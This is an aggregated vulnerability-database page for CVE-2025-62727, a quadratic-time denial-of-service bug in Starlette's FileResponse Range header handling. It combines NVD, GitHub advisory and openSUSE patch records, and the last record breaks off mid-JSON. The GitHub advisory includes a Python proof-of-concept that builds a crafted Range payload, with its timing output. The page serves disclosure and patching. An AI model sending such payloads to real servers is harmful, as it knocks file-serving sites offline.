|---|---|---|---|
| security-advisories@github.com | https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5 | ||
| security-advisories@github.com | https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c | ||
| security-advisories@github.com | https://github.com/Kludex/starlette/releases/tag/0.49.1 | ||
| security-advisories@github.com | https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8 | ||
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8 |
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1."
}
],
"id": "CVE-2025-62727",
"lastModified": "2026-04-15T00:35:42.020",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-10-28T21:15:40.447",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/Kludex/starlette/releases/tag/0.49.1"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-407"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-7F5H-V6XP-FCQ8
Vulnerability from github – Published: 2025-10-28 20:38 – Updated: 2025-11-04 17:40
VLAI?
Summary
Starlette vulnerable to O(n^2) DoS via Range header merging in ``starlette.responses.FileResponse``
Details
Summary
An unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial‑of‑service for endpoints serving files (e.g., StaticFiles or any use of FileResponse).
Details
Starlette parses multi-range requests in FileResponse._parse_range_header(), then merges ranges using an O(n^2) algorithm.
# starlette/responses.py
_RANGE_PATTERN = re.compile(r"(\d*)-(\d*)") # vulnerable to O(n^2) complexity ReDoS
class FileResponse(Response):
@staticmethod
def _parse_range_header(http_range: str, file_size: int) -> list[tuple[int, int]]:
ranges: list[tuple[int, int]] = []
try:
units, range_ = http_range.split("=", 1)
except ValueError:
raise MalformedRangeHeader()
# [...]
ranges = [
(
int(_[0]) if _[0] else file_size - int(_[1]),
int(_[1]) + 1 if _[0] and _[1] and int(_[1]) < file_size else file_size,
)
for _ in _RANGE_PATTERN.findall(range_) # vulnerable
if _ != ("", "")
]
The parsing loop of FileResponse._parse_range_header() uses the regular expression which vulnerable to denial of service for its O(n^2) complexity. A crafted Range header can maximize its complexity.
The merge loop processes each input range by scanning the entire result list, yielding quadratic behavior with many disjoint ranges. A crafted Range header with many small, non-overlapping ranges (or specially shaped numeric substrings) maximizes comparisons.
This affects any Starlette application that uses:
starlette.staticfiles.StaticFiles(internally returnsFileResponse) —starlette/staticfiles.py:178- Direct
starlette.responses.FileResponseresponses
PoC
#!/usr/bin/env python3
import sys
import time
try:
import starlette
from starlette.responses import FileResponse
except Exception as e:
print(f"[ERROR] Failed to import starlette: {e}")
sys.exit(1)
def build_payload(length: int) -> str:
"""Build the Range header value body: '0' * num_zeros + '0-'"""
return ("0" * length) + "a-"
def test(header: str, file_size: int) -> float:
start = time.perf_counter()
try:
FileResponse._parse_range_header(header, file_size)
except Exception:
pass
end = time.perf_counter()
elapsed = end - start
return elapsed
def run_once(num_zeros: int) -> None:
range_body = build_payload(num_zeros)
header = "bytes=" + range_body
# Use a sufficiently large file_size so upper bounds default to file size
file_size = max(len(range_body) + 10, 1_000_000)
print(f"[DEBUG] range_body length: {len(range_body)} bytes")
elapsed_time = test(header, file_size)
print(f"[DEBUG] elapsed time: {elapsed_time:.6f} seconds\n")
if __name__ == "__main__":
print(f"[INFO] Starlette Version: {starlette.__version__}")
for n in [5000, 10000, 20000, 40000]:
run_once(n)
"""
$ python3 poc_dos_range.py
[INFO] Starlette Version: 0.48.0
[DEBUG] range_body length: 5002 bytes
[DEBUG] elapsed time: 0.053932 seconds
[DEBUG] range_body length: 10002 bytes
[DEBUG] elapsed time: 0.209770 seconds
[DEBUG] range_body length: 20002 bytes
[DEBUG] elapsed time: 0.885296 seconds
[DEBUG] range_body length: 40002 bytes
[DEBUG] elapsed time: 3.238832 seconds
"""
Impact
Any Starlette app serving files via FileResponse or StaticFiles; frameworks built on Starlette (e.g., FastAPI) are indirectly impacted when using file-serving endpoints. Unauthenticated remote attackers can exploit this via a single HTTP request with a crafted Range header.
Severity ?
7.5 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.49.0"
},
"package": {
"ecosystem": "PyPI",
"name": "starlette"
},
"ranges": [
{
"events": [
{
"introduced": "0.39.0"
},
{
"fixed": "0.49.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62727"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-407"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-28T20:38:01Z",
"nvd_published_at": "2025-10-28T21:15:40Z",
"severity": "HIGH"
},
"details": "### Summary\nAn unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s `FileResponse` Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., `StaticFiles` or any use of `FileResponse`).\n\n### Details\nStarlette parses multi-range requests in ``FileResponse._parse_range_header()``, then merges ranges using an O(n^2) algorithm.\n\n```python\n# starlette/responses.py\n_RANGE_PATTERN = re.compile(r\"(\\d*)-(\\d*)\") # vulnerable to O(n^2) complexity ReDoS\n\nclass FileResponse(Response):\n @staticmethod\n def _parse_range_header(http_range: str, file_size: int) -\u003e list[tuple[int, int]]:\n ranges: list[tuple[int, int]] = []\n try:\n units, range_ = http_range.split(\"=\", 1)\n except ValueError:\n raise MalformedRangeHeader()\n\n # [...]\n\n ranges = [\n (\n int(_[0]) if _[0] else file_size - int(_[1]),\n int(_[1]) + 1 if _[0] and _[1] and int(_[1]) \u003c file_size else file_size,\n )\n for _ in _RANGE_PATTERN.findall(range_) # vulnerable\n if _ != (\"\", \"\")\n ]\n\n```\n\nThe parsing loop of ``FileResponse._parse_range_header()`` uses the regular expression which vulnerable to denial of service for its O(n^2) complexity. A crafted `Range` header can maximize its complexity.\n\nThe merge loop processes each input range by scanning the entire result list, yielding quadratic behavior with many disjoint ranges. A crafted Range header with many small, non-overlapping ranges (or specially shaped numeric substrings) maximizes comparisons.\n\n This affects any Starlette application that uses:\n\n - ``starlette.staticfiles.StaticFiles`` (internally returns `FileResponse`) \u2014 `starlette/staticfiles.py:178`\n - Direct ``starlette.responses.FileResponse`` responses\n\n### PoC\n```python\n#!/usr/bin/env python3\n\nimport sys\nimport time\n\ntry:\n import starlette\n from starlette.responses import FileResponse\nexcept Exception as e:\n print(f\"[ERROR] Failed to import starlette: {e}\")\n sys.exit(1)\n\n\ndef build_payload(length: int) -\u003e str:\n \"\"\"Build the Range header value body: \u00270\u0027 * num_zeros + \u00270-\u0027\"\"\"\n return (\"0\" * length) + \"a-\"\n\n\ndef test(header: str, file_size: int) -\u003e float:\n start = time.perf_counter()\n try:\n FileResponse._parse_range_header(header, file_size)\n except Exception:\n pass\n end = time.perf_counter()\n elapsed = end - start\n return elapsed\n\n\ndef run_once(num_zeros: int) -\u003e None:\n range_body = build_payload(num_zeros)\n header = \"bytes=\" + range_body\n # Use a sufficiently large file_size so upper bounds default to file size\n file_size = max(len(range_body) + 10, 1_000_000)\n \n print(f\"[DEBUG] range_body length: {len(range_body)} bytes\")\n elapsed_time = test(header, file_size)\n print(f\"[DEBUG] elapsed time: {elapsed_time:.6f} seconds\\n\")\n\n\nif __name__ == \"__main__\":\n print(f\"[INFO] Starlette Version: {starlette.__version__}\")\n for n in [5000, 10000, 20000, 40000]:\n run_once(n)\n\n\"\"\"\n$ python3 poc_dos_range.py\n[INFO] Starlette Version: 0.48.0\n[DEBUG] range_body length: 5002 bytes\n[DEBUG] elapsed time: 0.053932 seconds\n\n[DEBUG] range_body length: 10002 bytes\n[DEBUG] elapsed time: 0.209770 seconds\n\n[DEBUG] range_body length: 20002 bytes\n[DEBUG] elapsed time: 0.885296 seconds\n\n[DEBUG] range_body length: 40002 bytes\n[DEBUG] elapsed time: 3.238832 seconds\n\"\"\"\n```\n\n### Impact\nAny Starlette app serving files via FileResponse or StaticFiles; frameworks built on Starlette (e.g., FastAPI) are indirectly impacted when using file-serving endpoints. Unauthenticated remote attackers can exploit this via a single HTTP request with a crafted Range header.",
"id": "GHSA-7f5h-v6xp-fcq8",
"modified": "2025-11-04T17:40:59Z",
"published": "2025-10-28T20:38:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62727"
},
{
"type": "WEB",
"url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
},
{
"type": "WEB",
"url": "https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c"
},
{
"type": "PACKAGE",
"url": "https://github.com/Kludex/starlette"
},
{
"type": "WEB",
"url": "https://github.com/Kludex/starlette/releases/tag/0.49.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Starlette vulnerable to O(n^2) DoS via Range header merging in ``starlette.responses.FileResponse``"
}
OPENSUSE-SU-2025:15696-1
Vulnerability from csaf_opensuse - Published: 2025-11-01 00:00 - Updated: 2025-11-01 00:00Summary
python311-starlette-0.49.1-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: python311-starlette-0.49.1-1.1 on GA media
Description of the patch: These are all security issues fixed in the python311-starlette-0.49.1-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2025-15696
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
5 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-starlette-0.49.1-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-starlette-0.49.1-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15696",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15696-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62727 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62727/"
}
],
"title": "python311-starlette-0.49.1-1.1 on GA media",
"tracking": {
"current_release_date": "2025-11-01T00:00:00Z",
"generator": {
"date": "2025-11-01T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15696-1",
"initial_release_date": "2025-11-01T00:00:00Z",
"revision_history": [
{
"date": "2025-11-01T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-starlette-0.49.1-1.1.aarch64",
"product": {
"name": "python311-starlette-0.49.1-1.1.aarch64",
"product_id": "python311-starlette-0.49.1-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-starlette-0.49.1-1.1.aarch64",
"product": {
"name": "python312-starlette-0.49.1-1.1.aarch64",
"product_id": "python312-starlette-0.49.1-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-starlette-0.49.1-1.1.aarch64",
"product": {
"name": "python313-starlette-0.49.1-1.1.aarch64",
"product_id": "python313-starlette-0.49.1-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-starlette-0.49.1-1.1.ppc64le",
"product": {
"name": "python311-starlette-0.49.1-1.1.ppc64le",
"product_id": "python311-starlette-0.49.1-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-starlette-0.49.1-1.1.ppc64le",
"product": {
"name": "python312-starlette-0.49.1-1.1.ppc64le",
"product_id": "python312-starlette-0.49.1-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-starlette-0.49.1-1.1.ppc64le",
"product": {
"name": "python313-starlette-0.49.1-1.1.ppc64le",
"product_id": "python313-starlette-0.49.1-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-starlette-0.49.1-1.1.s390x",
"product": {
"name": "python311-starlette-0.49.1-1.1.s390x",
"product_id": "python311-starlette-0.49.1-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-starlette-0.49.1-1.1.s390x",
"product": {
"name": "python312-starlette-0.49.1-1.1.s390x",
"product_id": "python312-starlette-0.49.1-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-starlette-0.49.1-1.1.s390x",
"product": {
"name": "python313-starlette-0.49.1-1.1.s390x",
"product_id": "python313-starlette-0.49.1-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-starlette-0.49.1-1.1.x86_64",
"product": {
"name": "python311-starlette-0.49.1-1.1.x86_64",
"product_id": "python311-starlette-0.49.1-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-starlette-0.49.1-1.1.x86_64",
"product": {
"name": "python312-starlette-0.49.1-1.1.x86_64",
"product_id": "python312-starlette-0.49.1-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-starlette-0.49.1-1.1.x86_64",
"product": {
"name": "python313-starlette-0.49.1-1.1.x86_64",
"product_id": "python313-starlette-0.49.1-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-starlette-0.49.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.aarch64"
},
"product_reference": "python311-starlette-0.49.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-starlette-0.49.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.ppc64le"
},
"product_reference": "python311-starlette-0.49.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-starlette-0.49.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.s390x"
},
"product_reference": "python311-starlette-0.49.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-starlette-0.49.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.x86_64"
},
"product_reference": "python311-starlette-0.49.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-starlette-0.49.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.aarch64"
},
"product_reference": "python312-starlette-0.49.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-starlette-0.49.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.ppc64le"
},
"product_reference": "python312-starlette-0.49.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-starlette-0.49.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.s390x"
},
"product_reference": "python312-starlette-0.49.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-starlette-0.49.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.x86_64"
},
"product_reference": "python312-starlette-0.49.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-starlette-0.49.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.aarch64"
},
"product_reference": "python313-starlette-0.49.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-starlette-0.49.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.ppc64le"
},
"product_reference": "python313-starlette-0.49.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-starlette-0.49.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.s390x"
},
"product_reference": "python313-starlette-0.49.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-starlette-0.49.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.x86_64"
},
"product_reference": "python313-starlette-0.49.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-62727",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62727"
}
],
"notes": [
{
"category": "general",
"text": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial-of-service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.s390x",
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.x86_64",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.aarch64",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.ppc64le",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.s390x",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.s390x",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62727",
"url": "https://www.suse.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "SUSE Bug 1252805 for CVE-2025-62727",
"url": "https://bugzilla.suse.com/1252805"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.s390x",
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.x86_64",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.aarch64",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.ppc64le",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.s390x",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.s390x",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.s390x",
"openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.x86_64",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.aarch64",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.ppc64le",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.s390x",
"openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.s390x",
"openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-01T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-62727"
}
]
}
OPENSUSE-SU-2026:10109-1
Vulnerability from csaf_opensuse - Published: 2026-01-28 00:00 - Updated: 2026-01-28 00:00Summary
python311-sse-starlette-3.2.0-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: python311-sse-starlette-3.2.0-1.1 on GA media
Description of the patch: These are all security issues fixed in the python311-sse-starlette-3.2.0-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10109
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-sse-starlette-3.2.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python312-sse-starlette-3.2.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-sse-starlette-3.2.0-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
5 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-sse-starlette-3.2.0-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-sse-starlette-3.2.0-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10109",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10109-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62727 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62727/"
}
],
"title": "python311-sse-starlette-3.2.0-1.1 on GA media",
"tracking": {
"current_release_date": "2026-01-28T00:00:00Z",
"generator": {
